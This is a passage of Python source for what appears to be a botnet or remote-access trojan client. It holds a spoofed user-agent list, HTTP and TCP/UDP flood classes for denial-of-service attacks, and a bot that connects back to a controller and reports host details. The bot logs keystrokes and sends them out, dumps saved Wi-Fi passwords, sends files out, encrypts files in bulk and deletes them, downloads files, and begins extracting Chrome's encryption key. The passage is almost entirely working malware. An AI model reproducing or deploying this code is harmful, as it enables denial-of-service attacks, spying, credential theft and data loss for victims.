'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)',
'Links (2.1pre15; FreeBSD 5.4-STABLE i386; 158x58)', 'Wget/1.8.2',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.0', 'Mediapartners-Google/2.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.5) Gecko/20031007 Firebird/0.7',
'Mozilla/4.04 [en] (WinNT; I)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20060205 Galeon/2.0.0 (Debian package 2.0.0-2)',
'lwp-trivial/1.41', 'NetBSD-ftp/20031210', 'Dillo/0.8.5-i18n-misc',
'Links (2.1pre20; NetBSD 2.1_STABLE i386; 145x54)',
'Lynx/2.8.5rel.5 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d',
'Lynx/2.8.5rel.3 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d',
'Links (2.1pre19; NetBSD 2.1_STABLE sparc64; 145x54)',
'Lynx/2.8.6dev.15 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d',
'Links (2.1pre14; IRIX64 6.5 IP27; 145x54)', 'Wget/1.10.1',
'ELinks/0.10.5 (textmode; FreeBSD 4.11-STABLE i386; 80x22-2)',
'Links (2.1pre20; FreeBSD 4.11-STABLE i386; 80x22)',
'Lynx/2.8.5rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d-p1', 'Opera/8.52 (X11; Linux i386; U; de)',
'Mozilla/5.0 (X11; U; NetBSD i386; en-US; rv:1.8.0.1) Gecko/20060310 Firefox/1.5.0.1',
'Mozilla/5.0 (X11; U; IRIX64 IP27; en-US; rv:1.4) Gecko/20030711',
'Mozilla/4.8 [en] (X11; U; IRIX64 6.5 IP27)', 'Mozilla/4.76 [en] (X11; U; SunOS 5.8 sun4m)',
'Opera/5.0 (SunOS 5.8 sun4m; U) [en]', 'Links (2.1pre15; SunOS 5.8 sun4m; 80x24)',
'Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d', 'Wget/1.8.1', 'Wget/1.9.1',
'tnftp/20050625', 'Links (1.00pre12; Linux 2.6.14.2.20051115 i686; 80x24) (Debian pkg 0.99+1.00pre12-1)',
'Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/1.0.16',
'Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.7) Gecko/20051122', 'Wget/1.7',
'Lynx/2.8.2rel.1 libwww-FM/2.14', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; de) Opera 8.53',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7e',
'Links (2.1pre20; SunOS 5.10 sun4u; 80x22)',
'Lynx/2.8.5rel.5 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7i',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.8) Gecko/20060202 Firefox/1.5',
'Opera/8.51 (X11; Linux i386; U; de)', 'Emacs-W3/4.0pre.46 URL/p4.0pre.46 (i386--freebsd; X11)',
'Links (0.96; OpenBSD 3.0 sparc)', 'Lynx/2.8.4rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.6c',
'Lynx/2.8.3rel.1 libwww-FM/2.14',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)', 'libwww-perl/5.79',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.53',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.12) Gecko/20050919 Firefox/1.0.7',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar)',
'msnbot/1.0 (+http://search.msn.com/msnbot.htm)', 'Googlebot/2.1 (+http://www.google.com/bot.html)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051008 Firefox/1.0.7',
'Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; en) Opera 8.51',
'Mozilla/5.0 (compatible; Konqueror/3.4; Linux) KHTML/3.4.3 (like Gecko)',
'Lynx/2.8.4rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7c',
'Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/4.8 [en] (Windows NT 5.1; U)', 'Opera/8.51 (Windows NT 5.1; U; en)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', 'Opera/8.51 (Windows NT 5.1; U; en;VWP-online.de)',
'sproose/0.1-alpha (sproose crawler; http://www.sproose.com/bot.html; [email protected])',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0,gzip(gfe) (via translate.google.com)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'BrowserEmulator/0.9 see http://dejavu.org',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:0.9.4.1) Gecko/20020508',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/125.2 (KHTML, like Gecko)',
'Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.4) Gecko/20030624',
'iCCrawler (http://www.iccenter.net/bot.htm)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.6) Gecko/20050321 Firefox/1.0.2',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon; .NET CLR 1.1.4322)',
'Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.7.12) Gecko/20051013 Debian/1.7.12-1ubuntu1',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8) Gecko/20051111 Firefox/1.5',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:0.9.4.1) Gecko/20020508 Netscape6/6.2.3',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; de) Opera 8.50',
'Mozilla/3.0 (x86 [de] Windows NT 5.0; Sun)', 'Java/1.4.1_04',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8) Gecko/20051111 Firefox/1.5',
'msnbot/0.9 (+http://search.msn.com/msnbot.htm)',
'NutchCVS/0.8-dev (Nutch running at UW; http://www.nutch.org/docs/en/bot.html; [email protected])',
'Mozilla/4.0 compatible ZyBorg/1.0 ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; de) Opera 8.53',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.4) Gecko/20030619 Netscape/7.1 (ax)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.6',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)', 'Mozilla/4.0 (compatible; MSIE 5.16; Mac_PowerPC)',
'Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows 95)',
'Mozilla/4.0 (compatible; MSIE 5.5; AOL 7.0; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)',
'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)',
'Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)', 'Opera/8.53 (Windows NT 5.1; U; en)',
'Opera/8.01 (Windows NT 5.0; U; de)', 'Opera/8.54 (Windows NT 5.1; U; de)',
'Opera/8.53 (Windows NT 5.0; U; en)', 'Opera/8.01 (Windows NT 5.1; U; de)',
'Opera/8.50 (Windows NT 5.1; U; de)',
'Mozilla/4.0 (compatible- MSIE 6.0- Windows NT 5.1- SV1- .NET CLR 1.1.4322',
'Mozilla/4.0(compatible; MSIE 5.0; Windows 98; DigExt)',
'Mozilla/4.0 (compatible; Cerberian Drtrs Version-3.2-Build-0)',
'Mozilla/4.0 (compatible; AvantGo 6.0; FreeBSD)', 'Mozilla/4.5 [de] (Macintosh; I; PPC)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; .NET CLR 1.1.4322; MSN 9.0;MSN 9.1; MSNbMSNI; MSNmen-us; MSNcIA; MPLUS)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {59FC8AE0-2D88-C929-DA8D-B559D01826E7}; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; snprtz|S04741035500914#914|isdn; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EnergyPlugIn; dial)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; iebar; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; yplus 5.1.02b)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Arcor 5.004; .NET CLR 1.0.3705)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; YComp 5.0.0.0; SV1; .NET CLR 1.0.3705)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Ringo; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.1; .NET CLR 1.1.4322; yplus 4.1.00b)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; YPC 3.2.0)',
'Mozilla/4.0 (compatible; MSIE 6.0; AOL 7.0; Windows NT 5.1; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; BUILDWARE 1.6; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; HbTools 4.7.5)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.2.0; (R1 1.5)',
'Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; it)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Arcor 5.004; FunWebProducts; HbTools 4.7.5)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; en)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Tablet PC 1.7)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312469)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; SV1; FDM)',
'Mozilla/5.0 (Macintosh; U; PPC; de-DE; rv:1.0.2)', 'Mozilla/5.0 (Windows; U; Win98; de-DE; rv:1.7.12)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1)',
'Mozilla/5.0 (compatible; Konqueror/3.4; Linux 2.6.14-kanotix-9; X11)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.10)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.12)',
'Mozilla/5.0 (Windows; U; Win98; de; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; de; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.2)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.7)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6)',
'Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.8)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.7.10)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.8.0.1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8)',
'Mozilla/5.0 (Windows; U; Win 9x 4.90; de; rv:1.8.0.1)',
'Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.7.12)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.8)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; fi; rv:1.8.0.1)',
'Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.4.1)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR; rv:1.7.12)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; zh-TW; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-AT; rv:1.7.3)',
'Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.7.12)',
'Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.7.12)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.0.1)', 'Mozilla/5.0 (X11; Linux i686; rv:1.7.5)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.6)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.2)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.6)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.7.6)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8a3)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.10)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-AT; rv:1.7.12)',
'Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.7.5)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.0.1)',
'Mozilla/5.0 (compatible; Konqueror/3; Linux)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.8)',
'Mozilla/5.0 (compatible; Konqueror/3.2; Linux)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; tg)',
'Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.8b4)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51']
return user_agents
def stop_atk(self):
self.stopatk = True
def build_querystr(self, value):
result = ''
for i in range(value):
item = random.randint(65, 100)
result += chr(item)
return result
def ddos(self):
if not self.stopatk:
try:
code = 0
agent = random.choice(self.useragents)
req = urllib.request.Request(self.ip, headers={'User-Agent': agent,
'Referer': random.choice(
self.referers) + self.build_querystr(
random.randint(50, 100)),
'Cache-Control': 'no-cache',
'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Keep-Alive': random.randint(110, 160),
'Connection': 'keep-alive'})
urllib.request.urlopen(req)
code = 200
except urllib.error.HTTPError as e:
code_split = str(e).split()
code = code_split[2]
code = str(code[0] + code[1] + code[2])
if "500" in str(e):
code = 500
elif "429" in str(e):
code = 500
elif code.startswith('5'):
code = 500
except urllib.error.URLError as e:
if "A connection attempt failed" in str(e):
code = 500
except:
pass
return code
def start_thr(self):
while True:
try:
x = threading.Thread(target=self.ddos)
x.start()
time.sleep(self.delay)
if self.stopatk:
break
except:
pass
def ddos_start(self):
while True:
try:
http_code = self.ddos()
if http_code == 500:
break
if self.stopatk:
break
except:
pass
class TCP_UDP_Flood:
def __init__(self, ip, port, delay, pkt_size):
self.ip = ip
self.port = int(port)
self.delay = float(delay)
self.pkt_size = int(pkt_size)
self.stop = False
def gen_packet(self, size):
return random._urandom(size)
def UDP_Req(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(self.gen_packet(self.pkt_size), (self.ip, self.port))
s.close()
except:
pass
def TCP_req(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.ip, self.port))
s.send(self.gen_packet(self.pkt_size))
s.close()
except:
pass
def Stop_Atk(self):
self.stop = True
def TCP_Flood(self):
while True:
try:
tcp_req = threading.Thread(target=self.TCP_req)
tcp_req.start()
if self.stop:
break
time.sleep(self.delay)
except:
pass
def UDP_Flood(self):
while True:
try:
udp_req = threading.Thread(target=self.UDP_Req)
udp_req.start()
if self.stop:
break
time.sleep(self.delay)
except:
pass
class Bot:
def __init__(self, ip, port, key):
self.ip = ip
self.port = port
self.msg = ""
self.name = os.popen("whoami").read().strip()
if sys.platform == "win32":
self.desktop = f"C:/Users/{os.getlogin()}/Desktop"
elif sys.platform == "darwin":
self.desktop = f"/Users/{self.name}/Desktop"
else:
self.desktop = f"/"
self.logging = False
self.file_saving = False
while True:
try:
self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.connection.connect((self.ip, self.port))
break
except:
self.connection.close()
time.sleep(1)
try:
logger = threading.Thread(target=self.start_logging)
logger.start()
except:
pass
self.fileeditor = False
time.sleep(1)
msg = socket.gethostname()+" "+self.getip()+" "+os.getlogin()+" "+sys.platform
self.send(msg)
time.sleep(1)
self.send("!CLIENTLOG")
self.recv_thr = threading.Thread(target=self.recv)
self.recv_thr.start()
self.conntest = threading.Thread(target=self.conn_test)
self.conntest.start()
self.key = key
try:
self.fernet_session = Fernet(self.key)
except:
self.fernet_session = None
def getip(self):
try:
url = 'https://httpbin.org/ip'
req = urllib.request.Request(url)
result = urllib.request.urlopen(req)
try:
result = result.read().decode()
except:
result = result.read()
contents = result.split()
ip = contents[2].strip('"')
return ip
except:
pass
def send(self, msg):
try:
self.connection.send(msg.encode())
except:
self.connection.send(msg)
def recv(self):
while True:
try:
self.msg = self.connection.recv(1024)
try:
self.msg = self.msg.decode()
except:
pass
self.run_cmd()
except:
pass
def on_press(self, key):
if self.logging:
try:
self.send("!sendkey " + str(key))
except:
pass
def on_release(self, key):
pass
def start_logging(self):
try:
with Listener(on_press=self.on_press, on_release=self.on_release) as listener:
listener.join()
except:
pass
def obtainwifipass(self):
if sys.platform == "darwin":
self.send("This bot is on a Apple-based product. Unable to get wifi passwords!")
else:
item = subprocess.run(["netsh", "wlan", "show", "profiles"], capture_output=True).stdout.decode()
prof_names = (re.findall("All User Profile : (.*)\r", item))
passwords = []
check_networks = []
for i in prof_names:
item = subprocess.run(["netsh", "wlan", "show", "profiles", i], capture_output=True).stdout.decode()
security_key = False
security_key_present = (re.findall("Security key : (.*)\r", item))
if security_key_present[0] == "Present":
check_networks.append(i)
else:
pass
for i in check_networks:
item = subprocess.run(["netsh", "wlan", "show", "profiles", i, "key=clear"],
capture_output=True).stdout.decode()
wifi_pass = (re.findall("Key Content : (.*)", item))
wifi_pass = wifi_pass[0]
info = {'ssid': i, 'key': wifi_pass.strip()}
passwords.append(info)
main_msg = ""
for i in passwords:
main_msg = main_msg + str(i) + ","
main_msg = f"Wifi Passwords: {main_msg}"
return main_msg
def openfile(self, file):
try:
if sys.platform == "darwin":
os.system(f"open {file}")
else:
os.startfile(file)
except:
pass
def changedir(self, dir):
try:
os.chdir(dir)
except:
pass
def getinfo(self):
msg = f'''
IP: {self.getip()}
CWD: {os.getcwd()}
USERNAME: {os.getlogin()}
OS: {sys.platform}
'''
return msg
def returnsecondstr(self, msg):
instruction = msg.split()
secondstr = instruction[1]
return secondstr
def rmdir(self, dir):
try:
shutil.rmtree(dir)
except:
pass
def rmfile(self, file):
try:
os.remove(file)
except:
pass
def mkdir(self, dirname):
try:
os.mkdir(dirname)
except:
pass
def listdir(self):
try:
dirlist = os.listdir()
result = ""
item = 0
dir_count = len(dirlist)
for i in dirlist:
if item == dir_count:
result += f"{i}"
else:
result += f"{i}, "
item += 1
return result
except:
pass
def sendfile(self, filename):
try:
file = open(filename, 'rb')
content = file.read()
file.close()
self.send(content)
time.sleep(5)
self.send("finished".encode())
except:
pass
def file_content(self, filename):
try:
file = open(filename, 'rb')
content = file.read()
file.close()
self.send(content)
except:
pass
def encdir(self):
for i in os.listdir():
try:
file = open(i, 'rb')
content = file.read()
file.close()
enc_content = self.fernet_session.encrypt(content)
file = open(i, 'wb')
file.write(enc_content)
file.close()
except:
pass
def decdir(self):
for i in os.listdir():
try:
file = open(i, 'rb')
content = file.read()
file.close()
dec_content = self.fernet_session.decrypt(content)
file = open(i, 'wb')
file.write(dec_content)
file.close()
except:
pass
def encfile(self, filename):
try:
file = open(filename, 'rb')
content = file.read()
file.close()
enc_content = self.fernet_session.encrypt(content)
file = open(filename, 'wb')
file.write(enc_content)
file.close()
except:
pass
def decfile(self, filename):
try:
file = open(filename, 'rb')
content = file.read()
file.close()
dec_content = self.fernet_session.decrypt(content)
file = open(filename, 'wb')
file.write(dec_content)
file.close()
except:
pass
def getfrinternet(self, src ,filetocreate):
try:
output = os.popen(f"curl {src} -o {filetocreate}").read()
self.send(f"Created {filetocreate} into {os.getcwd()}")
except:
pass
def conn_test(self):
connected = True
while True:
try:
if connected:
self.send(" ")
time.sleep(1)
except:
connected = False
while True:
try:
self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.connection.connect((self.ip, self.port))
msg = socket.gethostname() + " " + self.getip() + " " + os.getlogin() + " " + sys.platform
self.send(msg)
time.sleep(1)
self.send("!CLIENTLOG".encode())
time.sleep(1)
connected = True
break
except:
pass
try:
logger = threading.Thread(target=self.start_logging)
logger.start()
except:
pass
def get_encryption_key(self):
local_state_path = os.path.join(os.environ["USERPROFILE"],
"AppData", "Local", "Google", "Chrome",
